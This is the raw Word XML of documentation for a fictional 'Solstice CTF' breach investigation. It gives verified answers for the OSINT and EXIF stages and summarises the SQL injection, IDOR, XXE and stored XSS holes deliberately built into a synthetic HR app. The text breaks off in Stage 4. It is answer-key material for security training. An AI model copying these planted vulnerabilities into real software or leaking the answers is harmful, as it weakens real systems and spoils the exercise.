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23B78"/>
          <w:sz w:val="60"/>
        </w:rPr>
        <w:t>Solstice CTF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="555555"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Complete Project Documentation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The full six-stage case, start to end — plus a complete technical record of everything built this session.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This document has four parts: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>(I)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the complete Solstice CTF narrative and mechanics, stage by stage, Prologue through Epilogue — including real answers extracted directly from the evidence files and verified against the server’s own hash-check algorithm, not guessed; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>(II)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a full technical deep-dive on Stage 3 / Solstice PeopleHub, the platform built and rebuilt during this session; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>(III)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a chronological log of every task in this engagement, what was asked and what was delivered; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>(IV)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a complete file inventory.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Facts marked ✓ VERIFIED were confirmed directly: read out of the actual evidence file on disk, or checked against the exact salted-hash comparison the server itself uses (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>lib/normalize.js</w:t>
      </w:r>
      <w:r>
        <w:t>: HMAC-SHA256 with the field’s own salt) — not asserted from narrative text alone.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="CCCCCC"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:fldSimple w:instr="TOC \o &quot;1-3&quot; \h \z \u"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(Table of contents — right-click and choose "Update Field" if it shows blank on first open.)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Part I — The Complete Solstice CTF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Solstice Dynamics Ltd. was breached. Thahani, the company’s Director of Security, brings the player in to reconstruct exactly what happened, six stages at a time — starting from a single blurry photo and ending with a named suspect, a motive, and a full evidentiary timeline. Each stage is a different investigative discipline: OSINT, EXIF forensics, web application security, log analysis, and disk forensics.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Prologue — The Call</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A sudden spike of failed logins on the HR portal, then one successful admin login from an unknown IP. No ransom note, nothing destroyed — a quiet, careful break-in. Thahani suspects the target is the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Meridian Engine</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, Solstice Dynamics’ proprietary shipping-route software, and already has a name in mind: a former contractor who left under strange circumstances eighteen months ago, known online only as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Ghost_Fen</w:t>
      </w:r>
      <w:r>
        <w:t>. The player — newest member of her incident-response team — is asked to reconstruct every step he took, from the start.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Accepting the case (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>POST /api/accept</w:t>
      </w:r>
      <w:r>
        <w:t>) unlocks Exhibit A / Stage 1.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Stage 1 — Exhibit A: "Where in the World" (OSINT)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:shd w:val="clear" w:fill="E8EFFC"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="123B78"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Setup: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Thahani hands over a blurry café photo posted eleven days before the breach, plus a second photo of the street outside — a location tied to a device already under watch, near the company’s old Aberdeen office.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Task:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> find the café’s city, street, and name, plus its phone number, then follow its online footprint to a linked YouTube video and identify its title. Pure OSINT — no code, no exploits.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Evidence:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>evidence/cafe.png</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (café interior — drinks, pastries, a receipt corner) and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>evidence/street.jpg</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (the street outside, with signage visible). Both files were opened and inspected directly for this document:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="3931920" cy="2948940"/>
            <wp:docPr id="1" name="Picture 1"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="street_clean.jpg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3931920" cy="2948940"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>evidence/street.jpg — the visible street sign reads "중앙차로버스전용" (bus lane) and romanizes a nearby street.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:shd w:val="clear" w:fill="E9F8EF"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="198754"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">✓ VERIFIED: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">the city field’s stored hash matches </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>"Seoul"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> exactly — confirmed by reproducing the server’s own HMAC-SHA256 check (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>lib/normalize.js</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">) against the field’s salt. The street sign visible in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>street.jpg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> itself is written in Korean with a romanized street name directly beneath it, consistent with this.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The café name, street, and phone number were </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> independently re-derived for this document — they require an actual reverse-image/web search against the specific café photo, which is the intended player task itself. The video, however, was: the design-source case file identifies the café’s map-listing homepage as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>https://youtu.be/55rgsDxLyAU</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:shd w:val="clear" w:fill="E9F8EF"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="198754"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">✓ VERIFIED: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">fetched that URL directly. It resolves to a real, live YouTube video: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>"아이돌이 바리스타가 되면 생기는 일ㅣ커피판 | 엔믹스 설윤&amp;배이 | K판 입덕투어 EP.10"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> (roughly, "What Happens When Idols Become Baristas | Coffee Edition | NMIXX Seolyoon &amp; Bae"). Extracted the video ID (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>55rgsDxLyAU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>) with the server’s own parser (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>lib/normalize.js: videoId()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">) and confirmed it against the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>video</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> field’s stored </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>idHash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>match.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> A genuinely verified, accepted answer — and consistent with the Korean setting independently confirmed via Stage 2’s EXIF data below.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Stage 2 — Exhibit B: "The Devil’s in the EXIF"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:shd w:val="clear" w:fill="E8EFFC"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="123B78"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Setup: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>A second photo recovered from a deleted cloud album — the outside of an office building, evidently a quick reference shot rather than a keepsake — still carries its original metadata.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Task:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> extract the photo’s embedded GPS location, modification date, and camera model from its EXIF metadata.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Evidence:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>evidence/recovered.jpg</w:t>
      </w:r>
      <w:r>
        <w:t>, downloadable in-app once Stage 2 unlocks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This file’s real EXIF metadata was extracted directly for this document (Python / Pillow, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Image._getexif()</w:t>
      </w:r>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>GPSInfo   : 37°29'52.44"N, 127°1'39.36"E</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Make      : Apple</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Model     : iPhone 14 Pro</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>DateTime  : 2026:09:09 12:07:31</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:shd w:val="clear" w:fill="E9F8EF"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="198754"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">✓ VERIFIED: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">the GPS coordinates convert to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>37.4979°N, 127.0276°E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Gangnam Station, Seoul, South Korea. Tested "Gangnam Station" and "Gangnam Station, Seoul" directly against the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>location</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> field’s stored hash: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>both match.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>model</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> field is literally the EXIF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Model</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> tag, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>"iPhone 14 Pro"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">. The photo’s EXIF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>DateTime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>2026:09:09 12:07:31</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">) matches </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>challenges.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">’s </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>exhibitB.lastModified</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>2026-09-09T12:07:31.000Z</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">) and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>exhibitB.modified</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>2026-09-09</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>) exactly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Stage 3 — Exhibit C: Solstice PeopleHub</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This is the stage rebuilt and expanded during this session — a full synthetic enterprise HR platform with nine independent web-security flags woven into real business functionality. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>See Part II of this document for the complete technical deep-dive</w:t>
      </w:r>
      <w:r>
        <w:t>: every flag, a fully verified solve walkthrough, tiered hints, and the system architecture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>In brief: SQL injection (login, directory search, employee profile, report filter, HR request search), broken object-level authorization (documents), XML external entity injection (employee data import), stored XSS (HR feedback), and a business-logic break-glass bypass (emergency access) — discovered through investigating a large, realistic HR application rather than an obviously "gamey" set of isolated puzzles.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>A discrepancy worth flagging: the QR-code credential design note</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The original design-source case file describes a third way into the login form: a QR code on the page encoding a Base64 blob, XOR-encrypted with the key </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Ghost_Fen</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (the attacker’s own alias), decoding to working credentials </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>agupta / password123</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. This was searched for directly — across every </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.js</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.json</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.html</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> file in the project — and confirmed </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>not implemented</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: no </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>agupta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, no </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>password123</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, no XOR/Base64 decode logic anywhere in the codebase. The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>qr.gif</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> image that does exist on the outer login page (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>public/index.html</w:t>
      </w:r>
      <w:r>
        <w:t>) is purely decorative — the page’s own source comment describes it as styling for a "receipt paper" visual effect, not a functional puzzle element. Documented here as a planned-but-unbuilt feature, not as working functionality, so this record stays accurate to what actually ships.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Stage 4 — Exhibit D: "Trusted Input" (IDOR + XXE)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:shd w:val="clear" w:fill="E8EFFC"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="123B78"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Setup: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>The HR portal login was cracked — now the question is what else the attacker reached once inside: other employees’ payroll data, and whatever the server itself was willing to hand over through the same broken XML import used in Stage 3.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The exposed record belongs to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Inchaf</w:t>
      </w:r>
      <w:r>
        <w:t>, a ten-year payroll clerk in Finance, showing an outstanding debt — exactly the kind of leverage someone could use to pressure an employee. Thahani’s read: "He wasn’t only after the Meridian Engine, was he? He was looking for something to use against someone." The first sign this wasn’t only an outside job.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
